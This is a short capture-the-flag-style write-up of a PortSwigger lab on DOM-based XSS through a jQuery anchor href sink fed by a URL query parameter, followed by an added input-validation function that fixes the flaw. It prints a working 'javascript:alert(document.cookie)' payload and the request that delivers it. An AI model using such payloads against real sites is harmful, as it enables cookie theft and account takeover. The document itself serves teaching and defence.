Port Swigger DOM XSS in jQuery anchor href attribu

DOM XSS in jQuery anchor href attribute sink using location.search source

Solution

Open website: https://0ac400610318386b80c4e9ac00cc0061.web-security-academy.net/feedback?returnPath=/

Add payload to GET request

Payload: javascript:alert(document.cookie)

Request: GET /feedback?returnPath=javascript:alert(document.cookie)

Click button "< Back"

https://0ac400610318386b80c4e9ac00cc0061.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)

Solved

Congratulations, you solved the lab!
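
The steps above work because the returnPath value from location.search is written into the back link's href without any check on its scheme. The following is an added example, not code from the lab or from PortSwigger: one way to validate the parameter before it reaches the href sink. The names safeReturnPath and APP_ORIGIN, the origin value and the #backLink selector in the comment are assumptions.

```javascript
// Added example: allow only same-origin, path-only values for returnPath.
// APP_ORIGIN is a constructed placeholder for the application's own origin.
const APP_ORIGIN = "https://app.example";

function safeReturnPath(search, fallback = "/") {
  const raw = new URLSearchParams(search).get("returnPath");
  if (raw === null || raw === "") return fallback;

  // Browsers strip tabs/newlines from URLs and treat "\" like "/",
  // so reject control characters, whitespace and backslashes outright.
  if (/[\u0000-\u0020\\]/.test(raw)) return fallback;

  // Accept only a path with a single leading slash. This rejects
  // "javascript:..." and protocol-relative "//host" values.
  if (!raw.startsWith("/") || raw.startsWith("//")) return fallback;

  // Resolve against our own origin and confirm it did not change.
  let url;
  try {
    url = new URL(raw, APP_ORIGIN);
  } catch {
    return fallback;
  }
  if (url.origin !== APP_ORIGIN) return fallback;

  // Return the normalized path, never the raw input.
  return url.pathname + url.search + url.hash;
}

// In the page (selector is an assumption):
//   $('#backLink').attr('href', safeReturnPath(window.location.search));
```

With this check in place, the request shown in the solution yields the fallback path instead of a javascript: URL in the link.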